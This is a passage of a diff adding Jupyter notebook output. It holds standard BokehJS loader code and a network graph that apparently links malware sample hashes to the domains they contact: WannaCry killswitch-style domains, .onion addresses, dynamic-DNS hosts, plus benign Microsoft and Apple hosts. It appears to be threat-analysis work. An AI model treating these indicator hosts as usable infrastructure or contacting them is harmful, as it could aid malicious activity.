*/\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2569\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2569\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"ca627f0b-ab19-482b-acc3-f77a04a27cd2\" data-root-id=\"2537\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"44502671-1afb-4199-98a3-94af624af738\":{\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2548\"}],\"center\":[{\"id\":\"2551\"},{\"id\":\"2555\"}],\"left\":[{\"id\":\"2552\"}],\"renderers\":[{\"id\":\"2559\"}],\"title\":{\"id\":\"2538\"},\"toolbar\":{\"id\":\"2557\"},\"x_range\":{\"id\":\"2540\"},\"x_scale\":{\"id\":\"2544\"},\"y_range\":{\"id\":\"2542\"},\"y_scale\":{\"id\":\"2546\"}},\"id\":\"2537\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"2710\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"2719\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Simple graph plot\"},\"id\":\"2538\",\"type\":\"Title\"},{\"attributes\":{\"axis\":{\"id\":\"2552\"},\"dimension\":1,\"ticker\":null},\"id\":\"2555\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2718\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2546\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"index\":[\"018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f\",\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd\",\"fkksjobnn43.org\",\"070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d\",\"76jdd2ir2embyv47.onion\",\"xxlvbrloxvriy2c5.onion\",\"gx7ekbenv2riucmf.onion\",\"57g7spgrzlojinas.onion\",\"cwwnhwhlz52maqm7.onion\",\"18e59a4f0492fcad0398c338000e5589950c9b700dddf662db6b594a7f816d9b\",\"crl.microsoft.com\",\"www.microsoft.com-c-3.edgekey.net\",\"go.microsoft.com.edgekey.net\",\"a767.dscg3.akamai.net\",\"e11290.dspg.akamaiedge.net\",\"au.download.windowsupdate.com.edgesuite.net\",\"go.microsoft.com\",\"crl.www.ms.akadns.net\",\"genuine.microsoft.com\",\"au-bg-shim.trafficmanager.net\",\"genuine.microsoft.akadns.net\",\"ctldl.windowsupdate.com\",\"validation.sls.microsoft.com\",\"a1363.dscg.akamai.net\",\"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net\",\"e13678.dspb.akamaiedge.net\",\"audownload.windowsupdate.nsatc.net\",\"validation.sls.trafficmanager.net\",\"www.microsoft.com\",\"19c570789e093cf18ae541875de261092e7405c0afa10cea643e10fde762eb6b\",\"1e06140672b73dfe337dfde7bc9dead5612bdbf4a8069be5de78fe68da6c75c4\",\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"2f4c58fd1ae5da5caac9b1425e4e03eaa40ab0b9cd82e5cc95b3238b021099da\",\"3176f3e73d8c3b8014deee94455b260530ab909a474853c58ac8b89b695b5364\",\"www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf\",\"3362cfab658f435fa2ba18c2ae36ab5ac376237d43bfba3cb19975d86aa49caa\",\"www.apple.com\",\"35ba6a17181a3a9c511e6145ce0d279663d50d56a83d27afdd4bfced31de36a6\",\"3847b8758c83dfa65e11cf01ce170eaffc0313bcd22ece3b4b2f3f7c280c2563\",\"3b1d735a140edac9954eba8bca0ad3a304b24f508cb5629054d5dbabec6861c3\",\"3dda654bdc5759a3c1f087b51dbc53b9f4ea3d330d0f13eb3d84e664ccb49ee1\",\"531d5538eed80b78d1c6c2023aa7e78a905e047c1164bba293d5e4f57c690fa5\",\"freedns.afraid.org\",\"xred.mooo.com\",\"pki-goog.l.google.com\",\"cs9.wac.phicdn.net\",\"www.000webhost.com\",\"www.dropbox.com\",\"ocsp.digicert.com\",\"googlehosted.l.googleusercontent.com\",\"xred.site50.net\",\"ocsp.pki.goog\",\"docs.google.com\",\"www.dropbox-dns.com\",\"doc-14-14-docs.googleusercontent.com\",\"ocsp.comodoca.com\",\"64488ed709c5ca9bf23bf943711e85faea008b341fbf662c8982649240aa8203\",\"cs11.wpc.v0cdn.net\",\"hlb.apr-52dd2-0.edgecastdns.net\",\"wu.azureedge.net\",\"wu.ec.azureedge.net\",\"wu.wpc.apr-52dd2.edgecastdns.net\",\"6bcd0c739a1bd991fcf9b5ee981324dfb3e3128afab0b278d92214a53d00a544\",\"729a3e8afccebe0f182f28acf03694d3636a442aca666e3ec743ba1c481fed8f\",\"onlinestores.metaservices.microsoft.com\",\"redir.metaservices.microsoft.com\",\"xiaobaruanjian.tk\",\"8130720f3b4a2ca80ff2358a1ca35fe5244b7107b3e0b9f8caba47c9d270e0a5\",\"world-gen.g.aaplimg.com\",\"time-osx.g.aaplimg.com\",\"e673.dsce9.akamaiedge.net\",\"e6987.a.akamaiedge.net\",\"e6987.e9.akamaiedge.net\",\"init-p01st.push.apple.com\",\"85752b880ed330884044f5f8922821a5844065c0aa513020f6477e4902e655b2\",\"86d6d44fb26fc2ba0b2217467ee9309900120dc762b2748661dc3c164942efac\",\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"8caf408b67ae62f93c26d62d9ae7779368616452a43411be652d2edd09514606\",\"9021dd020a9b81172d24ed40fbbeacd54bf066c9061bed2d52057a48ef27560e\",\"www.iuqerxxxdp9ifjaposdfjhgosurijfaewrwergwea.com\",\"90620dbc8327f6ae81447094db0d0a18b8c10444afb8e38e64a70e517058612d\",\"95.197.23.50.in-addr.arpa\",\"92d0bdac61167bbf84199166b835b97e3279eb8fd1519c7157693e0adfeff225\",\"9a2e1e8da634aa1cce446a9ee8f4de2a357eb76debf27938e43f6ac0d6c71009\",\"dmitri.duckdns.org\",\"9e83a136f334202223cc0dfed8b40a0d6cdbcf255a6865fd0a7e1dcc3d6623bc\",\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwee.com\",\"9f35e3393e442b4a35422e4b927e530712bac8ee2034a884b6ef724f0d8ec0ef\",\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.cum\",\"a3ce898184fe3427f009240a826803e0ad65f32ae5257a343d4b6b3753081d40\",\"a5232682719d10bff9c388fd3828e359fa6c41c6b301a8fdae87e70fd16bf707\",\"xan0n-31447.portmap.host\",\"aa1df63850b8eee6ba39ed3e4255b4bfb462886847ee032d89815da6e44eef81\",\"tra03.t3ded.com\",\"aa95e0c81899df737c571c9908aa0ffa58602402309ca0c9a77d071e60a7c155\",\"vvv.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"ac5c1bdedeb1ae6bfa7a4b0e8165a1c76c10a7bd7042b3872e53cff4e770e24e\",\"google.com\",\"powertoolsforyou.com\",\"ac77675cb33daced52440cec5cf17d5512e73f2f6e7a047dd776bfa17c078cd2\",\"arizonacode.bplaced.net\",\"www.blockchain.com\",\"blockchain.info\",\"ae55d74a872e43887e742ff7116613f6d070a2e33d79f14cf9965faae431c3cf\",\"b6ea24b4a643ed01cd7a40596ad506730a2f1dfa13acfd98a28f82d77631707d\",\"bd927d915f19a89468391133465b1f2fb78d7a58178867933c44411f4d5de8eb\",\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.test\",\"c8a8a17085c23f1af0d39dd20083b8edcf7e0701e308ac02f0dbbf22c7956177\",\"www.iuqerfsodp9ifjap1sdfjhgosurijfaewrwergwea.com\",\"d2560b1043f7326569c3c9185fea1b5777053ea4e451e92bf3302461cda8ec0d\",\"d30ccc27daebfae57dae3d8a144ca613896053f191923da0b7911e96990ecacd\",\"dfcd41e8822635b6148d690bc600df588f4ca2ee55f36c8b183acff6560d0afa\",\"e072cd048cd5ead7d22047412bf876a16442f1bb4deeb0b92e57f9ba85dc3899\",\"e39667a48c73846a26e09c806e1ce72d25471906fc88485528830079c84aff1c\",\"e575a260b7f9efe98a3674eb7347d01d447cebce0e6ef2b9b2444bdd0a98b0a2\",\"e9096f62367546637fea9422a1996e2120c677c6115d1157f6cb23dde590e8a0\",\"ee3332f2a6f0315aac695f621bb0af937e2e1656a13bc0f1a0725f09dd14267f\",\"f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad\",\"0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03\"]},\"selected\":{\"id\":\"2720\"},\"selection_policy\":{\"id\":\"2721\"}},\"id\":\"2561\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"formatter\":{\"id\":\"2716\"},\"ticker\":{\"id\":\"2553\"}},\"id\":\"2552\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"2549\",\"type\":\"BasicTicker\"},{\"attributes\":{\"source\":{\"id\":\"2561\"}},\"id\":\"2563\",\"type\":\"CDSView\"},{\"attributes\":{\"graph_layout\":{\"018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f\":[0.35214644952914037,-0.47322107992782864],\"02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd\":[-1.3354956024528275,-0.6125953316467164],\"070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d\":[0.2901943671373673,-0.12354669654300182],\"0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03\":[0.3779225476934703,0.048805084528017385],\"18e59a4f0492fcad0398c338000e5589950c9b700dddf662db6b594a7f816d9b\":[-0.38001563312076236,-0.12753171116571632],\"19c570789e093cf18ae541875de261092e7405c0afa10cea643e10fde762eb6b\":[0.22742295354311262,0.030731226963571667],\"1e06140672b73dfe337dfde7bc9dead5612bdbf4a8069be5de78fe68da6c75c4\":[0.5338772684451898,-0.37289213940527133],\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\":[0.5775875624317951,-0.35342870297197243],\"2f4c58fd1ae5da5caac9b1425e4e03eaa40ab0b9cd82e5cc95b3238b021099da\":[-1.3211119496507095,-0.4668075372732326],\"3176f3e73d8c3b8014deee94455b260530ab909a474853c58ac8b89b695b5364\":[0.3667327621269475,0.06622597876554667],\"32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf\":[0.6191263881408554,0.27595439153141665],\"3362cfab658f435fa2ba18c2ae36ab5ac376237d43bfba3cb19975d86aa49caa\":[-0.9628468665746699,0.9161831581246114],\"35ba6a17181a3a9c511e6145ce0d279663d50d56a83d27afdd4bfced31de36a6\":[0.3478019083023451,-0.03201565690783633],\"3847b8758c83dfa65e11cf01ce170eaffc0313bcd22ece3b4b2f3f7c280c2563\":[0.32897665627281264,0.03286901674842231],\"3b1d735a140edac9954eba8bca0ad3a304b24f508cb5629054d5dbabec6861c3\":[-1.000118728795789,0.8581464018268559],\"3dda654bdc5759a3c1f087b51dbc53b9f4ea3d330d0f13eb3d84e664ccb49ee1\":[0.35344374288890756,-0.10591069207953731],\"531d5538eed80b78d1c6c2023aa7e78a905e047c1164bba293d5e4f57c690fa5\":[0.01949814717070991,0.14921634793161584],\"57g7spgrzlojinas.onion\":[0.2912323569982314,-0.021516550479494086],\"64488ed709c5ca9bf23bf943711e85faea008b341fbf662c8982649240aa8203\":[-0.3933189033354645,0.019538123981138075],\"6bcd0c739a1bd991fcf9b5ee981324dfb3e3128afab0b278d92214a53d00a544\":[0.3182911501476541,-0.1354236393659765],\"729a3e8afccebe0f182f28acf03694d3636a442aca666e3ec743ba1c481fed8f\":[1.5170806106793013,-1.056053690137548],\"76jdd2ir2embyv47.onion\":[0.272755316277075,-0.009730096451768845],\"8130720f3b4a2ca80ff2358a1ca35fe5244b7107b3e0b9f8caba47c9d270e0a5\":[-0.5963711217541342,0.7281882624355812],\"85752b880ed330884044f5f8922821a5844065c0aa513020f6477e4902e655b2\":[0.2766110157547561,0.061004475509242255],\"86d6d44fb26fc2ba0b2217467ee9309900120dc762b2748661dc3c164942efac\":[0.5159499814308858,-0.5025064456160073],\"8caf408b67ae62f93c26d62d9ae7779368616452a43411be652d2edd09514606\":[0.41571636417786606,-0.4873339900247729],\"9021dd020a9b81172d24ed40fbbeacd54bf066c9061bed2d52057a48ef27560e\":[1.572070846511274,0.1310526880482833],\"90620dbc8327f6ae81447094db0d0a18b8c10444afb8e38e64a70e517058612d\":[0.16373011621208008,0.5313137639872333],\"92d0bdac61167bbf84199166b835b97e3279eb8fd1519c7157693e0adfeff225\":[0.29507645106197067,-0.14184682381655456],\"95.197.23.50.in-addr.arpa\":[0.22266122266194255,0.6821507591161585],\"9a2e1e8da634aa1cce446a9ee8f4de2a357eb76debf27938e43f6ac0d6c71009\":[-0.9752038828224916,1.365286001068877],\"9e83a136f334202223cc0dfed8b40a0d6cdbcf255a6865fd0a7e1dcc3d6623bc\":[0.39290813078586184,-0.05112921075819268],\"9f35e3393e442b4a35422e4b927e530712bac8ee2034a884b6ef724f0d8ec0ef\":[1.89164027416657,0.2599617707039502],\"a1363.dscg.akamai.net\":[-0.4518135843267505,-0.022865032506967677],\"a3ce898184fe3427f009240a826803e0ad65f32ae5257a343d4b6b3753081d40\":[0.559472805205812,-0.41886381410772533],\"a5232682719d10bff9c388fd3828e359fa6c41c6b301a8fdae87e70fd16bf707\":[-0.8361362977225262,-1.5153298821912402],\"a767.dscg3.akamai.net\":[-0.16541382126181609,-0.016784955879855238],\"aa1df63850b8eee6ba39ed3e4255b4bfb462886847ee032d89815da6e44eef81\":[1.9798439899119027,-0.2877598229967718],\"aa95e0c81899df737c571c9908aa0ffa58602402309ca0c9a77d071e60a7c155\":[0.39761126160674537,0.020079975843390302],\"ac5c1bdedeb1ae6bfa7a4b0e8165a1c76c10a7bd7042b3872e53cff4e770e24e\":[-1.0603683595944946,0.33803607438901795],\"ac77675cb33daced52440cec5cf17d5512e73f2f6e7a047dd776bfa17c078cd2\":[-0.8837519368379747,0.5526639143952222],\"ae55d74a872e43887e742ff7116613f6d070a2e33d79f14cf9965faae431c3cf\":[0.4778706258298316,-0.5197830490742463],\"arizonacode.bplaced.net\":[-0.878055633376014,0.6465665043211681],\"au-bg-shim.trafficmanager.net\":[-0.2298465020609694,0.031786139860893826],\"au.download.windowsupdate.com.edgesuite.net\":[-0.1752985586528489,0.01320012930148818],\"audownload.windowsupdate.nsatc.net\":[-0.23919584409955924,0.05252007093229573],\"b6ea24b4a643ed01cd7a40596ad506730a2f1dfa13acfd98a28f82d77631707d\":[0.50873431663119,-0.42960735005896533],\"bd927d915f19a89468391133465b1f2fb78d7a58178867933c44411f4d5de8eb\":[-0.19952209509663868,-1.9999999999999998],\"blockchain.info\":[-0.7991423249924119,0.6213197265181737],\"c8a8a17085c23f1af0d39dd20083b8edcf7e0701e308ac02f0dbbf22c7956177\":[0.39845920744758306,-0.015177506639596813],\"crl.microsoft.com\":[-0.45572679125948745,-0.07188957709757382],\"crl.www.ms.akadns.net\":[-0.4862830660248353,-0.04433772272378663],\"cs11.wpc.v0cdn.net\":[-0.41245917403626287,-0.11243264902998264],\"cs9.wac.phicdn.net\":[-0.2893209140861885,0.4511329952081283],\"ctldl.windowsupdate.com\":[-0.2211029712919668,0.010769250719522776],\"cwwnhwhlz52maqm7.onion\":[0.29469187981084966,-0.007142745259574187],\"d2560b1043f7326569c3c9185fea1b5777053ea4e451e92bf3302461cda8ec0d\":[-0.9146970259107199,0.7986043536830755],\"d30ccc27daebfae57dae3d8a144ca613896053f191923da0b7911e96990ecacd\":[0.3263688275400971,-0.11501259136555272],\"dfcd41e8822635b6148d690bc600df588f4ca2ee55f36c8b183acff6560d0afa\":[0.38875172065692565,-0.44260432126657623],\"dmitri.duckdns.org\":[-1.0380636951963873,1.4768713591415508],\"doc-14-14-docs.googleusercontent.com\":[0.10951540601718285,0.2775570603692386],\"docs.google.com\":[-6.644771375460217e-05,0.3287327209464487],\"e072cd048cd5ead7d22047412bf876a16442f1bb4deeb0b92e57f9ba85dc3899\":[0.34591339939378196,0.07765151406132897],\"e11290.dspg.akamaiedge.net\":[-0.39725361318200386,-0.25849966913226124],\"e13678.dspb.akamaiedge.net\":[-0.4463333651087252,-0.29597084553912983],\"e39667a48c73846a26e09c806e1ce72d25471906fc88485528830079c84aff1c\":[0.4574820785846312,-0.44202771637166854],\"e575a260b7f9efe98a3674eb7347d01d447cebce0e6ef2b9b2444bdd0a98b0a2\":[0.21397641428996944,-0.040534178608098145],\"e673.dsce9.akamaiedge.net\":[-0.5517143455120374,0.8559637712549639],\"e6987.a.akamaiedge.net\":[-0.6712005981497206,0.8647402064763258],\"e6987.e9.akamaiedge.net\":[-0.6139524813436192,0.8371262958813845],\"e9096f62367546637fea9422a1996e2120c677c6115d1157f6cb23dde590e8a0\":[0.25673964204245625,-0.07551027989230259],\"ee3332f2a6f0315aac695f621bb0af937e2e1656a13bc0f1a0725f09dd14267f\":[0.6560823377593111,0.2280962196573554],\"f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad\":[0.34717409075720645,-0.12734664467200635],\"fkksjobnn43.org\":[-1.3279527938460467,-0.5397944749834541],\"freedns.afraid.org\":[0.08623368891978342,0.3857456699627653],\"genuine.microsoft.akadns.net\":[-0.4549067846676169,-0.23361883538465683],\"genuine.microsoft.com\":[-0.5026043706275596,-0.1911338220126146],\"go.microsoft.com\":[-0.49067818761443827,-0.2763885919311099],\"go.microsoft.com.edgekey.net\":[-0.5453524797779629,-0.11183022092358816],\"google.com\":[-1.0976210812888603,0.23795583866913567],\"googlehosted.l.googleusercontent.com\":[0.060406840706335466,0.22940875836397598],\"gx7ekbenv2riucmf.onion\":[0.27804657868216603,-0.021458452273043414],\"hlb.apr-52dd2-0.edgecastdns.net\":[-0.3412143374218051,-0.06481686348437021],\"init-p01st.push.apple.com\":[-0.7766380711150808,0.7732553109857768],\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\":[0.5469369397084884,-0.6202875930125367],\"ocsp.comodoca.com\":[-0.038377471832744744,0.23113547091697567],\"ocsp.digicert.com\":[0.006985875341234786,0.27477058120589426],\"ocsp.pki.goog\":[-0.05069664549469226,0.3094358984401887],\"onlinestores.metaservices.microsoft.com\":[1.5815283215146658,-1.1557152308744822],\"pki-goog.l.google.com\":[0.12446405764214657,0.22537583550449025],\"powertoolsforyou.com\":[-0.97938025508898,0.44400338145320145],\"redir.metaservices.microsoft.com\":[1.6292617126940283,-1.1063065202626816],\"time-osx.g.aaplimg.com\":[-0.6833110781002075,0.8102995191310051],\"tra03.t3ded.com\":[1.8937557849941007,-0.2753350060328964],\"validation.sls.microsoft.com\":[-0.3396360275688988,-0.26867266245399135],\"validation.sls.trafficmanager.net\":[-0.5253340762352403,-0.24623021520978708],\"vvv.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\":[0.5681400291407457,0.07328380450512556],\"world-gen.g.aaplimg.com\":[-0.6082035654051794,0.8891531160544868],\"wu.azureedge.net\":[-0.48744661140474826,0.12810155226509634],\"wu.ec.azureedge.net\":[-0.530329093447989,0.09312649550975963],\"wu.wpc.apr-52dd2.edgecastdns.net\":[-0.5571324253925454,0.04574369440901707],\"www.000webhost.com\":[0.05857188223265067,0.30277739321137404],\"www.apple.com\":[-0.8469125242242288,0.8167545569698116],\"www.blockchain.com\":[-0.9075973026504348,0.6019195810691853],\"www.dropbox-dns.com\":[-0.08538950046441998,0.2739292471414969],\"www.dropbox.com\":[-0.10152765239782685,0.2199928610926453],\"www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com\":[0.5000467398819355,0.16185949719968787],\"www.iuqerfsodp9ifjap1sdfjhgosurijfaewrwergwea.com\":[0.5757533287985444,-0.011734799737387763],\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\":[0.40910763970334735,-0.31488984822985794],\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.cum\":[1.787037875918472,0.23230971773604495],\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.test\":[-0.19018749780779967,-1.885786341079507],\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwee.com\":[0.5642493643008824,-0.09481581720848505],\"www.iuqerxxxdp9ifjaposdfjhgosurijfaewrwergwea.com\":[1.5094342423841374,0.10783725258602285],\"www.microsoft.com\":[-0.39212180826865317,-0.3076919553077852],\"www.microsoft.com-c-3.edgekey.net\":[-0.5531984681182013,-0.2050783146666536],\"www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net\":[-0.55631782844369,-0.1570985707028368],\"xan0n-31447.portmap.host\":[-0.891622143478162,-1.6176373134267759],\"xiaobaruanjian.tk\":[1.473185243465657,-0.9973714671872066],\"xred.mooo.com\":[0.12062686469355301,0.37167988928216994],\"xred.site50.net\":[-0.07352225890634592,0.15703428530802963],\"xxlvbrloxvriy2c5.onion\":[0.2834988716784441,-0.00027167783383264356]}},\"id\":\"2568\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{\"data\":{\"end\":[\"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d\",\"1e06140672b73dfe337dfde7bc9dead5612bdbf4a8069be5de78fe68da6c75c4\",\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"3dda654bdc5759a3c1f087b51dbc53b9f4ea3d330d0f13eb3d84e664ccb49ee1\",\"6bcd0c739a1bd991fcf9b5ee981324dfb3e3128afab0b278d92214a53d00a544\",\"86d6d44fb26fc2ba0b2217467ee9309900120dc762b2748661dc3c164942efac\",\"8caf408b67ae62f93c26d62d9ae7779368616452a43411be652d2edd09514606\",\"92d0bdac61167bbf84199166b835b97e3279eb8fd1519c7157693e0adfeff225\",\"a3ce898184fe3427f009240a826803e0ad65f32ae5257a343d4b6b3753081d40\",\"ae55d74a872e43887e742ff7116613f6d070a2e33d79f14cf9965faae431c3cf\",\"b6ea24b4a643ed01cd7a40596ad506730a2f1dfa13acfd98a28f82d77631707d\",\"d30ccc27daebfae57dae3d8a144ca613896053f191923da0b7911e96990ecacd\",\"dfcd41e8822635b6148d690bc600df588f4ca2ee55f36c8b183acff6560d0afa\",\"e39667a48c73846a26e09c806e1ce72d25471906fc88485528830079c84aff1c\",\"f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad\",\"fkksjobnn43.org\",\"2f4c58fd1ae5da5caac9b1425e4e03eaa40ab0b9cd82e5cc95b3238b021099da\",\"76jdd2ir2embyv47.onion\",\"xxlvbrloxvriy2c5.onion\",\"gx7ekbenv2riucmf.onion\",\"57g7spgrzlojinas.onion\",\"cwwnhwhlz52maqm7.onion\",\"19c570789e093cf18ae541875de261092e7405c0afa10cea643e10fde762eb6b\",\"3176f3e73d8c3b8014deee94455b260530ab909a474853c58ac8b89b695b5364\",\"35ba6a17181a3a9c511e6145ce0d279663d50d56a83d27afdd4bfced31de36a6\",\"3847b8758c83dfa65e11cf01ce170eaffc0313bcd22ece3b4b2f3f7c280c2563\",\"3dda654bdc5759a3c1f087b51dbc53b9f4ea3d330d0f13eb3d84e664ccb49ee1\",\"531d5538eed80b78d1c6c2023aa7e78a905e047c1164bba293d5e4f57c690fa5\",\"6bcd0c739a1bd991fcf9b5ee981324dfb3e3128afab0b278d92214a53d00a544\",\"85752b880ed330884044f5f892282